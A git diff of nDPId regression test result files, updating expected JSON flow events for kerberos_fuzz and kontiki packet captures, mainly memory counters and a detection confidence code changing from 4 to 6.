00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":260,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633884084000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 813 chars diff --git a/test/results/kontiki.pcap.out b/test/results/kontiki.pcap.out index a865e634b..20dd90902 100644 --- a/test/results/kontiki.pcap.out +++ b/test/results/kontiki.pcap.out @@ -6,40 +6,40 @@ 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1213662198289,"pkt":"AAAMB6wIABVYKKDoCABFAAFTD48AACARip0KGSA7QMiUUk3sB5wBPyUCAgUEALiJxyqdfRurkGvxcQAAAAHGclB+GpXQo7ilG\/X+QBPHZNzcc2Vgl8HXEWakCXkI\/uj8lmIl1eBkbhN4MvAcq86Z98N3bIP98eTWEBdQEYXavGuDSMiGARvJZed\/c1zWfWkiBQDMPgD+Ih+\/PJjSy0mU1LUYMuUE02zzTShWQfCvM2Xa9SOg6ec0xfxrP6bVssVjaXJqz1AT6v7o8NtJtnsERCco1F8aGfNVg8yXB5v\/LbWp1E2sz6l3Uqjqcfx5ZJSkZLl83RIr7uaKcsAZozQEdGaeqFqM+vh1lG8CYU5v3cUXR+iWSzTqhorAV8WhTpNJoFMNHVApj2b53cJQug6cwf67kqgCY5\/UQxlKUrAgIAb+T+C6ITKs8wNPNWZJmf3s1l4sH4nkFe9HNSIG47QjMrQ="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198289,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD5AAAAIRqcsKGSA7QMiUVk3sIrgADIy+AgEBAA=="} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1213662198289,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213662198289,"pkt":"ABVYKKDoANAreRD8CABFwAA8nDwAAP4B8kgKGfkOChkgOwsA9I8AAAAARQAAIA+QAAABEarLChkgO0DIlFZN7CK4AAyMvgIBAQA="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.304229} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662198289,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.304229} 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1213662198292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1213662198292,"pkt":"ABVYKKDoANAreRD8CABFAADuAABAADQRRpFAyJRSChkgOwecTewA2iL0AgUEADrI\/CCQa\/FynX0bqwAAAAEU3Ww9OKrYuWJ\/RoFyF3QkawgIztP7rZEqNEZAvKFqVsbVX6Q7o7C1GOOdgQ95sj8arDoplqug4W5ycMyrjvQQyOwCiAR\/6y2A+p1htTIZLrGyKHiEi2Jp9hwzPzovQAePahwaDoff8ISW08I83wX6VJuH0Ja\/8FiWxNnH+Ai3SlJjJhuk49id1Yw4mSXZ8jvVv5UwGXcIGiI6B0mhLZ+A10L6EpKDfeBwW1y7ll9X6Tp66XFf4oxdv3GVbO9k"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1213662198298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662198298,"pkt":"AAAMB6wIABVYKKDoCABFAAAwD5EAACARi7gKGSA7QMiUWE3sAFAAHNz5AgUCAE9LWIs\/euHNAAAE5AIEAQA="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1213662198298,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198298,"pkt":"ABVYKKDoANABJAf8CABFAAA4wMIAAP8BppIKGSADChkgOwMN0aAAAAAARQAAMA+RAAAfEYy4ChkgO0DIlFhN7ABQABzc+Q=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198298,"flow_last_seen":1213662198298,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198298,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1213662198301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1213662198301,"pkt":"AAAMB6wIABVYKKDoCABFAAAsD5IAACARi8EKGSA7QMiUUk3sB5wAGMoHAgQkALiJxyqdfRurkGvxcg=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1213662198488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198488,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD5cAAAQRp8QKGSA7QMiUVk3sIrgADIy+AgEBAA=="} 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1213662198488,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198488,"pkt":"ABVYKKDoANAreRD8CABFwAA4pIcAAPwBJOPYqPGdChkgOwsADhsAAAAARQAAIA+XAAABEarEChkgO0DIlFZN7CK4AAx2NA=="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198488,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1213662198700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198700,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD6YAAAYRpbUKGSA7QMiUVk3sIrgADIy+AgEBAA=="} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1213662198701,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198701,"pkt":"ABVYKKDoANAreRD8CABFwAA4\/Y8AAPoBuFQET9t9ChkgOwsADhsAAAAARQAAIA+mAAABEaq1ChkgO0DIlFZN7CK4AAx2NA=="} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1213662200284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662200284,"pkt":"AAAMB6wIABVYKKDoCABFAAAwEAgAACARi0EKGSA7QMiUWE3sAFAAHLz5AgUiAE9LWIs\/euHNAAAE5AIEAQA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1213662200285,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662200285,"pkt":"ABVYKKDoANABJAf8CABFAAA4wRIAAP8BpkIKGSADChkgOwMN8aAAAAAARQAAMBAIAAAfEYxBChkgO0DIlFhN7ABQABy8+Q=="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2709,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1213662202284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662202284,"pkt":"AAAMB6wIABVYKKDoCABFAAAwEJ8AACARiqoKGSA7QMiUWE3sAFAAHLz5AgUiAE9LWIs\/euHNAAAE5AIEAQA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2710,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1213662202285,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662202285,"pkt":"ABVYKKDoANABJAf8CABFAAA4wVoAAP8BpfoKGSADChkgOwMN8aAAAAAARQAAMBCfAAAfEYuqChkgO0DIlFhN7ABQABy8+Q=="} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":3274,"flow_first_seen":1213662198289,"flow_last_seen":1213662202882,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":1241,"flow_tot_l4_payload_len":3714566,"flow_avg_l4_payload_len":1134,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":3274,"flow_first_seen":1213662198289,"flow_last_seen":1213662202882,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":1241,"flow_tot_l4_payload_len":3714566,"flow_avg_l4_payload_len":1134,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 